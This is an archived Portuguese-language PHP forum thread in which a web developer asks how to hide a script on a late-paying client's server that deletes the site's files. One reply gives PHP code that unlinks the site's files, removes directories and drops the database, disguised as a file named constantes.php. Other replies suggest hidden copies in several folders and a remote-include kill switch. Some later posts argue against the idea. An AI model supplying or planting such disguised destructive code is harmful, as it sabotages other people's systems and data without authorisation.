Ir para conteúdo

POWERED BY:

Arquivado

Este tópico foi arquivado e está fechado para novas respostas.

Alex Passos

Sistema de segurança contra caloteiros

Por , em PHP

Recommended Posts

Alex Passos    0

Alex Passos
Postado

Olá galera. Eu estou desenvolvendo um site pra um pessoal que não tem boa fama de pagamento em dia, claro já pequei 30% do serviço (só comecei quando me deram) mais e o restante? Então pensei em desenvolver um sistema em php que colocaria em escundido no servidor dele e quando executado apagasse arquivos e pastas do mesmo.Pesquisando achei esses código que acho que faz o que eu quero.pra criar eh o mkdir() se n me engano, da uma pesquisadaexclkuir arquivo eh o unlink()e excluir diretorio rmdir() Onde eu acho exemplos de como utilizar eles? Alguém tem outra idéia de como nus proteger desses problemas de mal pagadores.Obrigado

Compartilhar este post

Link para o post
Compartilhar em outros sites

Nícolas    4

Nícolas
Postado

Vixe, eu até já cheguei a fazer isso!!!

 

E comigo foi a melhor coisa que fiz.

 

Os caras foram tentar dar um golpe em mim com um sistema, eu fiz o sistema e tal, e eles ficaram de me pagar, e não pagaram, dai tentei conversar com eles e mesmo assim não pagaram, e ainda mudaram a senha do server para eu não ter mais acesso.

 

Só que eu fui prevenido.

 

O sistema tinha uma pasta chamada includes.

 

Aonde eu deixei um arquivo chamado constantes.php (Para não dar na cara que é um arquivo de emergencia).

 

Dai só executei a url.

 

Só que é o seguinte, paga apagar um diretório inteiro você deve apagar todos os arquivos primeiro, um por um.

 

ou seja.

 

<?//=============================================//// APAGANDO ARQUIVOS DO DIRETÓRIO PRINCIPALunlink ("index.php");unlink ("config.php");unlink ("principal.php");unlink ("contato.php");//=============================================//// APAGANDO ARQUIVOS DO DIRETÓRIO ADMINunlink ("admin/index.php");unlink ("admin/login.php");unlink ("admin/configma_login.php");...... Nome de todos os arquivos desta pasta....rmdir("/admin"); // remove o diretório admin?>

E também eu aproveitei e neste mesmo arquivo ele apagava o bd.

 

<?mysql_drop_db("Nome do BD");?>

Foi mais ou menos isso que fiz.

 

Você faz isso de cada arquivo se quiser, você pode apagar só os arquivos principais, e mais alguns.

 

Eu por segurança apaguei tudo.

 

Deu um trabalhinho, mas eles também não recuperaram nada.

 

E só foi eu executar o arquivo no server...

 

:D

Compartilhar este post

Link para o post
Compartilhar em outros sites

Alex Passos    0

Alex Passos
Postado

Grande nick171, você é um santo...

 

Só tenho uma dúvida

 

Ele só vai apagar arquivos e diretórios que eu determinar isso?

 

Porque estou querendo testar antes pra ver como funcionar.

 

Faço teste em um servidor que já tem outro site no ar e lá tem uma pasta para testes, se eu executar esse script só vai apagar apagar o que eu quero e não apagar nada do site em funcionamento.

 

 

http://forum.imasters.com.br/public/style_emoticons/default/joia.gif http://forum.imasters.com.br/public/style_emoticons/default/joia.gif B)

Compartilhar este post

Link para o post
Compartilhar em outros sites

André Gil    0

André Gil
Postado

faz um script usando opendir e foreach pra listar o conteudo de determinada pasta e da um if pra ver se for diretorio abre e apaga tudo q tiver dentro e se for arquivo ele ja apaga direto.. usando unlink... e rmdir...

Compartilhar este post

Link para o post
Compartilhar em outros sites

micox    2

micox
Postado

Eu acho que era bom também você colocar um sisteminha de login simples (dentro do próprio arquivo mesmo, sem bd pra nao complicar) pra que só voce pudesse apagar e pra que alguem não apaguasse sem querer acessando aquele URL.Ah. e acho que era bom também duplicar este arquivo com outros nomes em outras pastas, pra caso os caloteiros acharem o arquivo e deletarem-no, você ter cópias em outros lugares.

Compartilhar este post

Link para o post
Compartilhar em outros sites

Fabyo    66

Fabyo
Postado

so´acho dificil esses metodos funcionarem, tbm pensei nisso uma vez quando tava com medo de nao receber,

mas pensa assim e se o cara fazer uma copia do site por ftp, ele sendo o dono ele tem acesso

outra coisa se ele tirar seu acesso ao ftp e tirar opções de escrita do site, dai mesmo que você tenha um script que apague tudo nao tera permissao para apagar, e por garantia o cara ainda tem uma copia = )

 

o melhor mesmo é você colocar o sistema no seu servidor mostrar pra pessoa fazer testes depois que ela viu que ta ok, ela te paga e você passa o sistema pra ele

Compartilhar este post

Link para o post
Compartilhar em outros sites

André Gil    0

André Gil
Postado

e também o titular da conta de hospedagem tem acesso a backups que o servidor pode restaurar, o melhor é fazer o que o fabyo disse..mais garantido!!!

Compartilhar este post

Link para o post
Compartilhar em outros sites

Júlio César.    0

Júlio César.
Postado

Olá...Essa questão de pagar ou não pagar é complicado.. O pior é você montar um sistema para um kra, vende barato e depois o kra fica usando os seus scripts pra montar outros páginas. Eu acho o seguinte.. Se o kra pagou td bem ele tem direito aos codigos, porem ele tem o direito de piratear os seus codigos para outra pessoa? Pensando nisso estava pensando em algo q não sei se funciona.... Quando você coloca la dentro do seu sistema... <?require_once('config.inc.php');require_once('funcoes.inc.php');?>Não teria como fazer assim.<?require_once('http://www.seusite.com.br/config.inc.php');require_once('http://www.seusite.com.br/funcoes.inc.php');?>Pq assim você conseguiria limitar a conta do usuario, ou seja, você iria criar dentro da funcoes um script de controle do cliente onde ele acessando o endereço o seu script vai saber q ele esta autorizado a usar o sistema.Acho de deu pra entender o esquema.. Assim você poderia controlar ele no funcoes, se você cadastrar ele o sistema dele funciona, senao nao iria funcionar.[]´sJulioRs.. Desculpa se falei besteira.. rsrsrs

Compartilhar este post

Link para o post
Compartilhar em outros sites

Júlio César.    0

Júlio César.
Postado

Olá Flávia..Eu nem via a sua msg pois já estava com essa aberta quando fui em responder.. Ai não vi a sua msg.. sorry..Mais você usa assim mesmo ?require_once('http://www.seusite.com.br/funcoes.inc.php');você chamaria as funções desta forma q quero dizer ??Se não for assim como seria ?Obrigado pela ajudaJulio

Compartilhar este post

Link para o post
Compartilhar em outros sites

Wagner Bianchi    0

Wagner Bianchi
Postado

Olá gente,

 

Acho que a questão aqui vai além da facilidade de simplesmente "despublicar" arquivos do servidor.

Acabo concordando com àquilo que foi sugestinado pelo Adailton e mais, o seu cliente não deve em hipótese alguma ter login e senha do server. . .ali quem mexe é você e daí você mantém seus custos e mantendo serviços. Além do que você deve ter sempre seu cliente dependendo da sua empresa. . .

 

Quanto a fechar os sistemas, com JS para clique do botão direito, HTML-SECURITY, ehehehe. . .não adianta muito, publicou, é "copiável". . .mesmo que estaja no Japão! (até lá existe calote. . .eheheh)

 

Abraço a todos e que DEUS abençõe!! http://forum.imasters.com.br/public/style_emoticons/default/joia.gif http://forum.imasters.com.br/public/style_emoticons/default/joia.gif http://forum.imasters.com.br/public/style_emoticons/default/joia.gif

Compartilhar este post

Link para o post
Compartilhar em outros sites
Ir para a lista de tópicos PHP
×

Informação importante

Ao usar o fórum, você concorda com nossos Termos e condições.

  Aceito